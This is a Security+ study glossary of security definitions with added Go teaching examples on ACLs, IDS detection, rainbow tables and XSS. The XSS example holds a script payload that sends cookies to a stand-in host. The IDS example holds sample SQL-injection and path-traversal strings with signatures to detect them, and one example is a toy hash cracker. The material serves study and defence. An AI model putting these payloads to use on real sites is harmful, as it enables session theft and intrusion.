Security +


NIDS

(network intrusion detection system) A system that uses passive hardware sensors to monitor traffic on a specific segment of the network.

rogue access point

(rogue AP) is an AP placed within a network without official authorization. It might be an employee who is bypassing security or installed by an attacker.

Secure Staging Environment

1. Development, 2. Test, 3. Staging, 4. Production

Passive scan (Wireless Scanner)

a scanner just listens to all the traffic being broadcast on known channels within the 2.4 GHz and 5 GHz frequency ranges.

risk register

a comprehensive document listing known information about risks. ▪ It typically includes risk scores along with recommended security controls to reduce the risk scores.

warm site

a recovery site that sits between a hot site and a cold site in cost and readiness: power, connectivity, and most hardware are in place, but current data and configurations must be restored from backups before operations can resume, so failover takes hours to days rather than minutes.

legal hold

a directive from legal counsel (often prompted by litigation or a court order) requiring the organization to preserve specific data as potential evidence. Data under a legal hold is exempt from normal retention and deletion schedules until the hold is lifted.

VPN concentrators

dedicated devices used to manage incoming VPN connections. They include all the services needed to create a secure VPN system, supporting many clients.

Hardware and firmware Security

electromagnetic interference (EMI), electromagnetic pulse (EMP), FDE and SED, UEFI and BIOS, Trusted Platform Module, Hardware security module (HSM).

Organized crime

elements are typically motivated by greed and money but often use sophisticated techniques.

full tunnel (VPN)

encrypts all traffic after a user has connected to a VPN

LDAP Secure (LDAPS)

encrypts data with TLS using TCP port 636.

Internet Protocol security (IPsec) Tunnel mode

encrypts the entire original IP packet (headers and payload) and wraps it in a new IP packet, so the addressing used within the internal network is hidden from anyone who intercepts the traffic on the Internet. This is the mode used for site-to-site and remote-access VPNs; Transport mode encrypts only the payload and is used host-to-host inside a network. IPsec is a secure encryption protocol used with VPNs. Encapsulating Security Payload (ESP) provides confidentiality, integrity, and authentication for the tunneled traffic and is identified by IP protocol number 50 (AH is protocol 51). IKE negotiates the keys over UDP port 500, with UDP port 4500 used for NAT traversal (NAT-T).

Secure Shell (SSH)

encrypts traffic in transit and serves as the transport for other protocols: SFTP and SCP are file-transfer protocols that run over SSH (distinct from FTPS, which is FTP over TLS). SSH uses TCP port 22.

Continuing education programs

ensure that personnel are kept up to date on current technologies, threats, and vulnerabilities.

Motion detection

methods are often combined with other physical controls such as cameras and lighting to increase their effectiveness. Infrared (PIR) detectors sense movement by detecting the temperature difference between a moving body and its background.

Routers and stateless firewalls (or packet-filtering firewalls)

perform basic filtering with an access control list (ACL).

Encapsulating Security Payload (ESP)

to encrypt the payload and provide confidentiality. ESP also carries its own integrity check value, so it provides authentication and integrity as well; it does not include AH. AH (protocol 51) provides only integrity and authentication and is unnecessary when ESP is used with authentication enabled. ESP uses IP protocol number 50.

MDM Content management

After creating segmented storage spaces, it's important to ensure that appropriate content is stored there.

MDM Containerization

Containerization creates segmented, encrypted storage spaces on the device that isolate corporate applications and data from the user's personal apps and data, so the organization can manage or wipe the corporate container without touching personal content.

Escalation

After identifying an incident, personnel often need to escalate it.

Lightweight Extensible Authentication Protocol (LEAP)

A Cisco-proprietary EAP method for 802.1X wireless authentication (an authentication method, not an encryption protocol like TKIP). LEAP relies on MS-CHAP-style password hashing and is vulnerable to offline dictionary attacks, so it should be replaced by PEAP or EAP-TLS.

Dipole Antenna

A simple two-element antenna that radiates equally in all directions in the plane perpendicular to its axis (the usual omnidirectional pattern) and has nulls along the axis itself. Because it concentrates energy into that doughnut-shaped pattern rather than a sphere, a dipole delivers more power in those directions than an ideal isotropic radiator fed with the same power, which is why antenna gain is quoted in dBi (relative to isotropic) or dBd (relative to a dipole).

Static code analysis

Analysis of source code carried out without executing the software; the tool examines the code itself for defects and insecure patterns.

Implicit and Explicit Deny

Another way to look at it: a bouncer at a nightclub with a list of people allowed in is an example of implicit deny. Anyone not on that list is denied entry, even though no rule names them. On the flip side, a less popular club down the street has no guest list, but the bouncer keeps a list of people known to cause trouble; those people are turned away and everyone else can come in. That is an explicit deny. Firewall ACLs work the same way: rules are checked in order, and whatever is not explicitly matched falls through to the default action at the end of the list.
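The two bouncers as a first-match ACL evaluator, written as an added example for this page (not the page's own code). The rule sets, prefixes and ports are constructed for the demo: the allowlist ends in an implicit deny, the denylist ends in an implicit allow, and the same Evaluate function handles both, which is how a router or stateless firewall processes an access list.

```go
package main

import (
	"fmt"
	"net/netip"
)

// Rule is one ACL entry. Port 0 matches any port. Rules are evaluated
// top-down and the first match wins, as on a router or stateless firewall.
type Rule struct {
	Action string // "allow" or "deny"
	Src    netip.Prefix
	Port   int
}

func (r Rule) matches(src netip.Addr, port int) bool {
	return r.Src.Contains(src) && (r.Port == 0 || r.Port == port)
}

// Evaluate walks the ACL; if nothing matches, the default action applies.
// An allowlist ACL ends in an implicit deny; a denylist ACL ends in an
// implicit allow, which is why denylists only stop the threats you already know.
func Evaluate(acl []Rule, defaultAction string, src netip.Addr, port int) string {
	for _, r := range acl {
		if r.matches(src, port) {
			return r.Action
		}
	}
	return defaultAction
}

// Hypothetical ACLs for the demo (constructed, not from the page).
var (
	// Implicit deny: only listed sources get in (the guest-list bouncer).
	allowList = []Rule{
		{"allow", netip.MustParsePrefix("10.0.0.0/24"), 443},
		{"allow", netip.MustParsePrefix("10.0.1.0/24"), 0},
	}
	// Explicit deny: listed sources are blocked, everyone else gets in.
	denyList = []Rule{
		{"deny", netip.MustParsePrefix("198.51.100.0/24"), 0},
		{"deny", netip.MustParsePrefix("203.0.113.7/32"), 22},
	}
)

func AllowListDecision(src string, port int) string {
	return Evaluate(allowList, "deny", netip.MustParseAddr(src), port)
}

func DenyListDecision(src string, port int) string {
	return Evaluate(denyList, "allow", netip.MustParseAddr(src), port)
}

func main() {
	cases := []struct {
		src  string
		port int
	}{{"10.0.0.8", 443}, {"10.0.0.8", 22}, {"192.0.2.1", 443}, {"203.0.113.7", 22}, {"203.0.113.7", 80}}
	for _, c := range cases {
		fmt.Printf("%s:%d allowlist=%s denylist=%s\n", c.src, c.port,
			AllowListDecision(c.src, c.port), DenyListDecision(c.src, c.port))
	}
}
```

Note the 192.0.2.1 case: the allowlist rejects it because nothing matches, the denylist admits it for exactly the same reason.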

Threat

Any circumstance or event that has the potential to compromise confidentiality, integrity, or availability; a potential danger. A threat assessment evaluates potential threats.

Physical Controls

Any controls that you can physically touch. e.g. lighting, signs, security guards, and more.

Sniffing attack

Attackers often use a protocol analyzer to capture data sent over a network.

Eradication (Incident Response Process)

Attempts to remove all malicious components from an attack

IPsec provides security in two ways

Authentication Header (AH) and Encapsulating Security Payload (ESP)

Something you are

Authentication factor that relies on a physical characteristic (fingerprint, face, eye, palm)

Something you have

Authentication factor that relies on possession (FOB, Card, Cell Phone, Key)

psychology-based principles

Authority ▪ Intimidation ▪ Consensus ▪ Scarcity ▪ Urgency ▪ Familiarity ▪ Trust

Device Deployment Models

Corporate-owned, personally enabled (COPE), bring your own device (BYOD), choose your own device (CYOD), and virtual desktop infrastructure (VDI).

Single Loss Expectancy (SLE)

Cost associated with a single realized risk against a specific asset. SLE = AV * EF

Virtualization

Creates multiple "virtual" machines on a single computing device

IPS vs IDS

Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, unfragment packet streams, prevent TCP sequencing issues, and clean up unwanted transport and network layer options.

Risk Avoidance

Involves identifying a risk and making the decision to no longer engage in actions associated with that risk.

Risk Deterrence

Involves understanding something about the enemy and letting them know harm can come their way if they cause harm to you.

Power

a critical utility to consider when reviewing redundancies. ▪ A UPS provides fault tolerance for power and can protect against power fluctuations. It provides short-term power. ▪ Generators provide long-term power in extended outages.

Fixed-length Hashing

The output is always the same size no matter the size of the input (for example, SHA-256 always produces 256 bits).

Exposure Factor (EF)

The percentage of loss that an org would experience if a specific asset were violated

Host (virtualization)

The physical machine, together with the hypervisor or host operating system running on it, that hosts the VMs.

Crossover Error Rate (CER)

The point at which FAR crosses over with the FRR. Expressed as a percentage, this is the most important metric. Lower CER indicates that the biometric system is more accurate.

Risk

The possibility or likelihood of a threat exploiting a vulnerability resulting in a loss.

Annual Loss Expectancy (ALE)

The possible yearly cost of all instances of a specific realized threat against a specific asset ALE = SLE * ARO or AV * EF * ARO

Full disk encryption (FDE)

The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product.

Production (Secure Staging Environment)

The production environment is the final product.

Digital certificate

a data file that binds a public key to the identity of an individual, organization, or system and is signed by a certificate authority (CA). Relying parties verify the CA's digital signature on the certificate to trust that binding; the certificate is not itself a signature, but it is what makes verifying the holder's signatures and TLS connections possible.

War dialing

War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems and fax machines. Hackers use the resulting lists for various purposes: hobbyists for exploration, and crackers - malicious hackers who specialize in computer security - for guessing user accounts (by capturing voicemail greetings), or locating modems that might provide an entry-point into computer or other electronic systems. It may also be used by security personnel, for example, to detect unauthorized devices, such as modems or faxes, on a company's telephone network.

Counter Mode With Cipher Block Chaining Message Authentication Code Protocol (CCMP)

Was created to replace WEP and TKIP/ WPA ❑Uses AES.

DNS poisoning or DNS cache poisoning

When successful, attackers modify the DNS cache with a bogus IP address.

End-of-life systems

When systems, hardware, or software are not supported by the original vendor, it is a vulnerability. When systems reach the end of their life, you need to ensure that they don't have any valuable data on them before disposing of them.

evil twin

a rogue access point with the same SSID as a legitimate access point. For example, many public places such as coffee shops, hotels, and airports include free Wi-Fi as a service.

Group Policy

Administrators use Group Policy Objects (GPOs) to configure settings.

AES

Advanced Encryption Standard. Key sizes 128, 192, or 256 bits.

Counter-mode

Converts a block cipher into a stream cipher: the cipher encrypts a nonce concatenated with an incrementing counter to produce a keystream, which is XORed with the plaintext. Because the keystream depends only on the key and nonce, a nonce must never be reused under the same key.

RAID 10

configuration combines the features of mirroring (RAID-1) and striping (RAID-0).

Router

connects multiple network segments together into a single network and routes traffic between the segments.

wireless access point (AP)

connects wireless clients to a wired network.

Disassociation attack

effectively removes a wireless client from a wireless network, forcing it to reauthenticate.

asset value

identifies the worth of the asset to the organization.

distributed DoS (DDoS) attack

includes multiple computers attacking a single target.

Burning

media or documents in an incinerator.

File shredding

purges a file by repeatedly overwriting the space where the file is located with patterns of 1s and 0s. This is reliable on magnetic disks but not on SSDs, where wear leveling can leave old copies in blocks the operating system cannot address; for flash media use the drive's secure-erase command or encryption with key destruction.

CCMP

(Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) Created to address the vulnerabilities presented by Wired Equivalent Privacy (WEP), a dated, insecure protocol. An encryption protocol designed for Wireless LAN products that implements the standards of the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM mode) of the Advanced Encryption Standard (AES) standard.

Heuristic/ behavioral-based detection

(also called anomaly-based detection) starts by identifying normal operation or normal behavior of the network. It does this by creating a performance baseline under normal operating conditions and then alerting on significant deviations from that baseline. This lets it detect previously unknown attacks, at the cost of more false positives than signature-based detection, which only identifies attacks matching known patterns.

Signature-based IDSs

(also called definition-based) use a database of known vulnerabilities or known attack patterns and alert when traffic matches one. For example, tools are available for an attacker to launch a SYN flood attack on a server by simply entering the IP address of the target, and the traffic such a tool produces can be written as a signature. Signature-based detection identifies known attacks reliably but cannot detect unknown (zero-day) attacks, which is where heuristic or behavior-based (anomaly-based) IDSs come in.
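Both detection styles run over the same constructed access-log lines, as an added example for the two entries above (not the page's own code). The log format, the two signatures and the "mean plus k standard deviations" threshold are assumptions for the demo: the signature scan catches the two lines that match known patterns, and the baseline-derived threshold catches the source hammering the host with requests that match no signature at all.

```go
package main

import (
	"fmt"
	"math"
	"regexp"
	"sort"
	"strings"
)

// Constructed sample access-log lines for the demo (not captured traffic).
// Format: "<source IP> <method> <path> <status>".
var baselineLog = []string{
	"10.0.0.5 GET /index.html 200",
	"10.0.0.5 GET /about.html 200",
	"10.0.0.6 GET /index.html 200",
	"10.0.0.6 POST /login 302",
	"10.0.0.7 GET /index.html 200",
	"10.0.0.7 GET /css/site.css 200",
	"10.0.0.7 GET /js/app.js 200",
	"10.0.0.8 GET /index.html 200",
}

var observedLog = append([]string{
	"10.0.0.5 GET /index.html 200",
	"10.0.0.9 GET /login?user=admin'%20OR%20'1'='1 200", // known SQLi pattern
	"10.0.0.6 GET /../../etc/passwd 404",               // known traversal pattern
}, floodLines("10.0.0.99", 12)...) // unknown tool hammering one host: no signature

func floodLines(src string, n int) []string {
	out := make([]string, n)
	for i := range out {
		out[i] = fmt.Sprintf("%s GET /probe%d 404", src, i)
	}
	return out
}

// signature is one entry of a definition-based rule set.
type signature struct {
	Name string
	Re   *regexp.Regexp
}

var signatures = []signature{
	{"sqli-tautology", regexp.MustCompile(`(?i)'(%20|\s)*or(%20|\s)*'`)},
	{"path-traversal", regexp.MustCompile(`\.\./`)},
}

type SigHit struct {
	Line string
	Rule string
}

// SignatureScan flags only lines that match a known pattern.
func SignatureScan(lines []string) []SigHit {
	var hits []SigHit
	for _, l := range lines {
		for _, s := range signatures {
			if s.Re.MatchString(l) {
				hits = append(hits, SigHit{l, s.Name})
			}
		}
	}
	return hits
}

func source(line string) string { return strings.Fields(line)[0] }

func countBySource(lines []string) map[string]int {
	c := make(map[string]int)
	for _, l := range lines {
		c[source(l)]++
	}
	return c
}

// Threshold learns requests-per-source from a baseline window: mean + k standard deviations.
func Threshold(baseline []string, k float64) float64 {
	counts := countBySource(baseline)
	var sum float64
	for _, n := range counts {
		sum += float64(n)
	}
	mean := sum / float64(len(counts))
	var ss float64
	for _, n := range counts {
		d := float64(n) - mean
		ss += d * d
	}
	return mean + k*math.Sqrt(ss/float64(len(counts)))
}

// AnomalyScan flags every source whose request count in the observed window
// exceeds the learned threshold, whether or not any signature knows the attack.
func AnomalyScan(baseline, observed []string, k float64) []string {
	limit := Threshold(baseline, k)
	var flagged []string
	for src, n := range countBySource(observed) {
		if float64(n) > limit {
			flagged = append(flagged, src)
		}
	}
	sort.Strings(flagged)
	return flagged
}

func main() {
	for _, h := range SignatureScan(observedLog) {
		fmt.Printf("signature %-15s %s\n", h.Rule, h.Line)
	}
	fmt.Printf("baseline threshold: %.2f requests per source\n", Threshold(baselineLog, 3))
	fmt.Println("anomalous sources:", AnomalyScan(baselineLog, observedLog, 3))
}
```

The trade-off the entries describe is visible in the output: the signatures name exactly what they matched, while the anomaly detector only says that 10.0.0.99 is abnormal and leaves the analyst to find out why.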

Incident response process

1. Preparation, 2. Identification, 3. Containment, 4. Eradication, 5. Recovery, 6. Lessons Learned.

Advanced Encryption Standard (AES)

128, 192, 256 bit keys

Twofish

128-bit block cipher with 128-, 192-, or 256-bit keys (the 32-448-bit key range belongs to its predecessor, Blowfish).

SHA1

160-bit hash length. Still encountered but deprecated: practical collision attacks have been demonstrated, so it should not be used for signatures or certificates; use SHA-2 or SHA-3.

Triple-DES (3DES)

168-bit key (three 56-bit DES keys). Effective security is about 112 bits because of meet-in-the-middle attacks, and 3DES is deprecated in favor of AES.

Health Insurance Portability and Accountability Act (HIPAA)

1996 mandates that organizations protect PHI.

FTP Port

21/20 TCP

SCP Port

22 TCP (uses SSH port)

SHA2

224, 256, 384, and 512 bit hash lengths (SHA-224, SHA-256, SHA-384, SHA-512).

Telnet port

23 TCP

SMTP Port

25 TCP

Data Encryption Standard (DES)

56-bit key. Used since the mid 1970s.

Blowfish

64-bit block cipher with 32 - 448 bit keys

Snapshots

A snapshot backup captures all the data of an entire system at a point in time. It is a common technique used to create a checkpoint for a VM.

SMTP

sends email between servers on TCP port 25 ▪ Mail submission from clients uses TCP port 587 with STARTTLS ▪ TCP port 465 is used for SMTP with implicit TLS (originally SSL, now standardized as SMTPS).

Least functionality

A core principle of secure systems design: systems should be deployed with only the applications, services, and protocols needed to meet their purpose.

General Data Protection Regulation (GDPR)

the protection of privacy data for individuals within the EU.

Virtual Desktop Infrastructure (VDI) or Virtual Desktop Environment (VDE)

A desktop operating system running within a virtual machine (VM) running on a server.

Wireless LAN Controller

A device that cooperates with wireless lightweight access points (LWAP) to create a wireless LAN by performing some control functions for each LWAP and forwarding data between each LWAP and the wired LAN. (LWAP = Thin AP)

FM-200

A clean-agent (gaseous) fire suppression system used in server rooms and data centers because it extinguishes fires without leaving residue or damaging electronic equipment, unlike water sprinklers.

AUP (Acceptable Use Policy)

A Set of rules and guidelines that are set up to regulate Internet use and to protect the user. A document stipulating constraints and practices that a user must agree to for access to a corporate network or the Internet. Many businesses and educational facilities require that employees or students sign an acceptable use policy before being granted a network ID.

Secure Copy Protocol (SCP)

A TCP/IP protocol used mainly on UNIX and Linux systems that securely transports files by encrypting both the file data and the commands. It runs over SSH, so it uses SSH's authentication and provides the same security as SSH. Unlike RCP, SCP asks for passwords or passphrases when they are needed for authentication. SSH uses TCP port 22, and everything tunneled over SSH, including SFTP, SCP, and remote shell sessions, uses that same port.

Regression Testing Policy

A backout plan is the procedure for reverting a change that had negative consequences; regression testing is what you run after a change to confirm that existing functionality still works, and a failed regression test is a typical trigger for the backout. It could be, for example, that everything was working fine until you installed a service pack on a production machine, and then services that were normally available were no longer accessible. The backout, in this instance, would revert the system to the state it was in before the service pack was applied. Backout plans can include uninstalling service packs, hotfixes, and patches, but they can also include reversing a migration and reinstalling previous firmware. A key component of creating such a plan is identifying what events will trigger the backout.

Change Control Policy

A change control policy refers to the structured approach that is followed to secure a company's assets in the event of changes occurring.

Recovery Agent

A key recovery agent is an entity that has the ability to recover a private key, key components, or plaintext messages as needed. Using the recovered key the recovery agent can decrypt encrypted data.

Master Image

A master image provides a secure starting point for systems. Administrators sometimes create them with templates or with other tools to create a secure baseline. They then use integrity measurements to discover when a system deviates from the baseline.

Ping scan

A ping scan (sometimes called a ping sweep) sends an Internet Control Message Protocol (ICMP) ping to a range of IP addresses in a network. Network scanner

Port scan

A port scan checks for open ports on a system. Network scanner

Cluster Tip

A portion of a disk cluster that has not been fully taken up by the file written to it (also called slack space). Think of it this way: if you wrote a sentence on paper with a pencil and then wanted to reuse the same line for a different message, you would normally erase the sentence before writing the new one. Windows does something similar with disk clusters, but crucially it doesn't erase the whole cluster; it only overwrites as much as the new file needs, so if the new file is shorter than the previous one, the leftover bytes of the old file remain in the cluster tip and can be recovered forensically.

Rainbow Table Attack

A rainbow table attack cracks password hashes by looking them up in a rainbow table: a precomputed structure that stores chains of hash-and-reduce operations over a password space, so that a stolen unsalted hash can be matched back to its password far faster than brute force. (A rainbow table is a lookup table, not a hash function.) Salting each password with a random value before hashing defeats the attack, because the precomputed table no longer corresponds to the stored hashes.
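A working miniature of the technique, added here as an example (not the page's own code). The parameters are assumptions chosen so it runs in milliseconds: the password space is the 10,000 four-digit PINs, the stored hash is unsalted SHA-256, and the table keeps 256 chains of length 64. Only chain start and end points are stored; a lookup walks the hash from every possible column to a chain end, then regenerates that chain to read off the password. The salted lookup at the end fails because the table was built without the salt.

```go
package main

import (
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// Toy parameters for the demo (assumptions, not from the page).
const (
	space      = 10000 // PINs "0000".."9999"
	chainLen   = 64
	chainCount = 256
)

func hashPIN(pin string) []byte {
	h := sha256.Sum256([]byte(pin))
	return h[:]
}

// hashSalted is the defence: a per-user random salt is prepended before hashing.
func hashSalted(salt, pin string) []byte {
	h := sha256.Sum256([]byte(salt + pin))
	return h[:]
}

// reduce maps a hash back into the password space. The column index i is mixed
// in so every column uses a different reduction function; that is what makes
// this a rainbow table rather than a plain hash-chain table.
func reduce(h []byte, i int) string {
	n := binary.BigEndian.Uint64(h[:8])
	return fmt.Sprintf("%04d", (n+uint64(i))%space)
}

// RainbowTable stores only each chain's start and end; intermediate values are
// recomputed on demand, which is the time/memory trade-off of the technique.
type RainbowTable struct {
	ends map[string]string // endpoint -> start
}

func Build() *RainbowTable {
	t := &RainbowTable{ends: make(map[string]string)}
	for j := 0; j < chainCount; j++ {
		start := fmt.Sprintf("%04d", (j*37)%space)
		p := start
		for i := 0; i < chainLen; i++ {
			p = reduce(hashPIN(p), i)
		}
		t.ends[p] = start
	}
	return t
}

// Lookup tries every column the target hash could occupy, walks to the chain
// end, and on a hit regenerates the chain to read off the password.
func (t *RainbowTable) Lookup(target []byte) (string, bool) {
	for i := chainLen - 1; i >= 0; i-- {
		x := reduce(target, i)
		for k := i + 1; k < chainLen; k++ {
			x = reduce(hashPIN(x), k)
		}
		start, ok := t.ends[x]
		if !ok {
			continue
		}
		p := start
		for k := 0; k < i; k++ {
			p = reduce(hashPIN(p), k)
		}
		if string(hashPIN(p)) == string(target) {
			return p, true
		}
		// otherwise a false alarm caused by merged chains; keep searching
	}
	return "", false
}

func main() {
	tbl := Build()
	victim := reduce(hashPIN("0000"), 0) // a PIN the table is known to cover
	pin, ok := tbl.Lookup(hashPIN(victim))
	fmt.Printf("unsalted %s... -> found=%v pin=%s\n", hex.EncodeToString(hashPIN(victim))[:16], ok, pin)
	_, ok = tbl.Lookup(hashSalted("u1:9f3a", victim))
	fmt.Printf("salted hash        -> found=%v (table was built without the salt)\n", ok)
}
```

Coverage of the space is deliberately partial (256 chains of 64 steps, with merges), which is also true of real tables; the point is that any hash the table does cover is recovered with a few thousand hash operations instead of a search over the whole space, and that a salt pushes every hash outside the table.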

Sector Antenna

A sector antenna is a type of directional microwave antenna with a sector-shaped radiation pattern. The word "sector" is used in the geometric sense; some portion of the circumference of a circle measured in degrees of arc.

TKIP (Temporal Key Integrity Protocol)

A security protocol created by the IEEE 802.11i task group to replace WEP. Used in WPA. It was designed to replace WEP without replacing the existing legacy wireless hardware, so it keeps the RC4 cipher but adds per-packet key mixing, a sequence counter against replay, and a message integrity check (Michael). TKIP is weak and deprecated: practical attacks on its integrity check exist, and it should not be used today.

PBX (Private Branch Exchange)

A telephone switch used to connect and manage an organization's voice calls. A private telephone network used within a company or organization. The users of the PBX phone system can communicate internally (within their company) and externally (with the outside world), using different communication channels like Voice over IP, ISDN or analog.

swap file (page file)

A temporary storage area on the hard drive where the operating system "swaps out" or moves the data or instructions from random access memory (RAM) that haven't recently been used. This process takes place when more RAM space is needed.

Model verification

A test used to ensure that the projected application meets all specifications at that point and fulfills its intended purpose.

Thin AP

A thin AP is a controller-based AP: it isn't a stand-alone device but is configured and managed by a wireless LAN controller, and it functions more like a managed radio or antenna. A fat AP (stand-alone AP) holds all of its own configuration and is managed independently.

Spim

A variation of spam, which targets instant messaging users instead of email users. Could be on Social Media sites like Facebook or Instagram

Password Authentication Protocol (PAP)

A weak authentication protocol that has been replaced by CHAP and the Extensible Authentication Protocol (EAP). PAP authenticates with a password or PIN sent across the network in cleartext, making it susceptible to sniffing attacks, so it is used only as a last resort.

Captive Portals

A web page that the user of a public-access network is obliged to view and interact with before access is granted ▪ Typically used by business centers, airports, hotel lobbies, coffee shops, and other venues that offer free Wi-Fi hot spots ▪ May require the user to input payment information, provide login credentials, or input an access code ▪ Also used to display an acceptable use policy, privacy policy, and tracking policy to users

Remote Access

Administrators connect to servers remotely using protocols such as Secure Shell (SSH) and the Remote Desktop Protocol (RDP port 3389). ▪ In some cases, administrators use virtual private networks to connect to remote systems.

One of the primary reasons that wireless attacks are successful

APs are misconfigured.

Host elasticity and scalability

Ability to resize computing capacity based on the load

Transparent proxy servers

Accept and forward requests without modifying them. This proxy isn't seen by the computer.

Hardware

Additional physical security controls protect individual systems. ▪ For example, server rooms often have locking cabinets to protect servers and other equipment installed in the equipment bays.

Enable a disabled account

Administrators can reset the user's password and take control of the account.

Full Backup

All data is backed up which requires a lot of time and storage space.

Identification (Incident Response Process)

All events aren't security incidents so when a potential incident is reported, personnel take the time to verify it is an actual incident.

Security Assertion Markup Language (SAML)

An XML-based standard used to exchange authentication and authorization information, used for single sign-on (SSO) on web browsers. An identity provider (for example, a corporate directory) authenticates the user once and sends a signed assertion to each service provider the user accesses, so one authentication system shares its result with another. (Consumer "sign in with Google" buttons typically use OpenID Connect rather than SAML.)

Port Channel

An aggregation of multiple physical interfaces that creates a logical interface. You can bundle up to eight individual active links into a port channel to provide increased bandwidth and redundancy. Port channeling also load balances traffic across these physical interfaces. The port channel stays operational as long as at least one physical interface within the port channel is operational.

Application whitelist and blacklist

An application whitelist is a list of authorized software and it prevents users from installing or running software that isn't on the list. An application blacklist is a list of unauthorized software and prevents users from installing or running software on the list.

Armored Virus

An armored virus is coded to make it difficult for antivirus to unravel and understand. It uses a variety of techniques to do so like fooling antivirus to believe that it lies somewhere else than its real location or using compression to complicate its code.

VM escape

An attack in which the attacker "breaks out" of a VM's normally isolated state and interacts directly with the hypervisor.

IV Attack

An attack in which the attacker exploits a predictable, reused, or too-short initialization vector. With a stream cipher such as RC4, reusing an IV under the same key reuses the keystream, so XORing two ciphertexts cancels the keystream and exposes the XOR of the plaintexts; if one plaintext is known, the other is recovered without the key. WEP's 24-bit IV is short enough that reuse occurs on a busy network within hours, and collecting enough IVs lets attackers recover the WEP key itself.

Wi - Fi Protected Access (WPA)

An early alternative to WEP ❑Uses the TKIP cryptosystem (still RC4-based) with either a secret pre-shared passphrase (WPA-Personal) or 802.1X/EAP authentication (WPA-Enterprise) ❑Interim solution until the release of 802.11i (WPA2) ❑Corrected some of the serious weaknesses of WEP ❑Introduced the Temporal Key Integrity Protocol (TKIP) ➢Replaces WEP's short static key with TKIP 128-bit per-packet keys. This system should not be used.

IV

An initialization vector is a per-message value combined with the key so that encrypting the same plaintext twice produces different ciphertext. Without it, a repeated plaintext block (or, in a stream cipher, a repeated keystream) produces repeated ciphertext, and an attacker who can see the pattern, or who knows one of the plaintexts, can recover the other. The IV need not be secret, but it must never repeat under the same key. WEP (Wired Equivalent Privacy) is vulnerable to an IV attack: it uses RC4 with a 24-bit IV, and because RC4 is a stream cipher, the same keystream must never be used twice.

MDM Context-aware authentication

Context-aware authentication uses multiple elements to authenticate a user and a mobile device.

BSD

Berkeley Software Distribution

Buildings

Buildings commonly have additional controls for both safety and security.

Personal Identity Verification (PIV)

Card is a specialized smart card used by U.S. Federal agencies. it also includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users, just as CAC does.

Deterrent Controls

Controls designed to discourage people from violating security directives. e.g. Cable locks, hardware locks, cameras.

CSR

Certificate Signing Request: a message sent from an applicant to a certificate authority to apply for a digital certificate. It contains the applicant's public key and identity information and is signed with the matching private key, which proves possession of that key without ever sending it. When you renew a certificate you send a new CSR to the CA to get a freshly signed certificate.

Change management

Change management defines the process and accounting structure for handling modifications and upgrades. The goals are to reduce risks related to unintended outages and provide documentation for all changes. helps ensure that developers do not make unauthorized changes. ▪ change management process allows several people to examine the change to ensure it won't cause unintended consequences.

Stealth Virus

Changes the code that can be used to detect it. Hence, the detection of virus becomes very difficult.

Order of volatility

Cache memory ▪ Regular RAM ▪ Swap or paging file ▪ Hard drive data ▪ Logs stored on remote systems ▪ Archived media

MDM Biometrics

Biometrics (something you are), such as fingerprint or face recognition, can be required to unlock the mobile device, and MDM policy can mandate or restrict their use.

Apple macOS

Closed-source operating system only compatible with Apple manufactured hardware.

Microsoft Windows

Closed-source operating system that is compatible with hardware from many different manufacturers.

Data Destruction and Media Sanitization

Computers that reach the end of their life cycle will need to be disposed of. Sanitize the media first to ensure that the computers don't contain any sensitive data that could harm your organization if unauthorized people receive it.

OpenID

OpenID Connect is an identity layer on top of OAuth 2.0 that allows clients to verify the identity of end users without managing their credentials. In this context, the client is typically a web site or application that needs to authenticate users.

PEM

Contains base64 ("ASCII armored") DER data between -----BEGIN ...----- and -----END ...----- lines. PEM files can hold X.509 certificates, private keys, or certificate signing requests; the label in the BEGIN line says which.

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
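The flaw and its fix side by side, as an added example (not the page's own code). The attacker input and page template are constructed for the demo. RenderUnsafe concatenates user input straight into HTML, so the script tag is emitted as markup; RenderSafe renders the same template through Go's html/template, which applies output encoding appropriate to where the value lands.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
)

// Constructed attacker input for the demo.
const attackerName = `<script>document.location='https://evil.test/?c='+document.cookie</script>`

// RenderUnsafe builds the page with plain string concatenation, so whatever
// the user supplied is emitted as markup: the reflected XSS the entry describes.
func RenderUnsafe(name string) string {
	return "<p>Welcome, " + name + "!</p>"
}

// Parsed once; html/template escapes each value according to its context
// (HTML text here; attribute, URL and JavaScript contexts get their own rules).
var page = template.Must(template.New("welcome").Parse(`<p>Welcome, {{.}}!</p>`))

// RenderSafe renders the same page with contextual output encoding.
func RenderSafe(name string) (string, error) {
	var buf bytes.Buffer
	if err := page.Execute(&buf, name); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	fmt.Println("unsafe:", RenderUnsafe(attackerName))
	safe, err := RenderSafe(attackerName)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:  ", safe)
}
```

The encoded output still displays the attacker's text to the user, which is the correct outcome: the browser shows it as literal characters and never executes it.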

CRC

Cyclic Redundancy Check is an error-detecting code commonly used in digital networks and storage devices to detect accidental changes to raw data.

Certificate Formats

DER, PEM, PFX, CER, P12, and P7b.

DER

DER-encoded (binary) certificates use the .der, .cer, and .crt file extensions. The .cer and .crt extensions are also used for PEM files, so check the content rather than trusting the extension.
